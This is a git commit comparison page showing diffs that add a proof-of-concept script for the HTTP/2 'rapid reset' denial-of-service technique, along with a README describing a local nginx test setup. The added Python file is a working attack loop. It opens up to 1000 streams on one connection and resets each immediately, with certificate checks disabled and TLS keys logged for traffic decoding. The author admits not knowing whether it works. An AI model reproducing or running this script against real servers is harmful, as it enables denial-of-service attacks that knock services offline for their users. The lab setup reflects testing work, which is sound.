Compare commits

..

2 Commits

Author SHA1 Message Date
188ab59701 Add PoC 2023-10-11 19:26:30 -04:00
1a42bd06fe Use get_next_available_stream_id 2023-10-11 19:22:45 -04:00
4 changed files with 72 additions and 6 deletions

5
.gitignore vendored
View File

@ -2,4 +2,7 @@ venv/
.idea/
__pycache__/
*.py[cod]
*.py[cod]
# ignore ssl keylogs
*.log

View File

@ -1,12 +1,22 @@
# rr-dev
start http/2 enabled nginx server:
1. start http/2 enabled nginx server:
```
cd server
docker compose up -d
```
run poc:
2. start capturing traffic in wireshark
3. run poc script:
```
# needs to be written first, lol
```
python rr.py
```
4. decode traffic in wireshark using `ssl-keylog.log` as the ssl keyfile
## notes
no clue if this actually works, but it seems to match the same behavior
mentioned in the cloudflare blog.
greets to psyk0, slerig, and all the other juggalols out there

View File

@ -44,7 +44,7 @@ def make_http2_request():
(':scheme', 'https'),
]
c.send_headers(
stream_id=1,
stream_id=c.get_next_available_stream_id(),
headers=headers,
end_stream=True
)

View File

@ -1 +1,54 @@
"""rrpoc"""
import socket
import ssl
import certifi
import h2.connection
import h2.events
from time import sleep
ctx = ssl.create_default_context(cafile=certifi.where())
ctx.set_alpn_protocols(['h2'])
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.keylog_filename = 'ssl-keylog.log'
def send_rr_packets(server='localhost', port=443, max_streams=1000):
s = socket.create_connection((server, port))
s = ctx.wrap_socket(s, server_hostname=server)
c = h2.connection.H2Connection()
c.initiate_connection()
s.sendall(c.data_to_send())
headers = [
(':method', 'GET'),
(':path', '/foo'),
(':authority', server),
(':scheme', 'https'),
]
for _ in range(max_streams):
sid = c.get_next_available_stream_id()
c.send_headers(
stream_id=sid,
headers=headers,
end_stream=True
)
c.reset_stream(sid)
s.sendall(c.data_to_send())
# Add sleep or else the socket gets closed which causes server to
# stop trying to respond to our requests.
sleep(60)
s.close()
def main():
send_rr_packets(server='localhost', port=443)
if __name__ == '__main__':
main()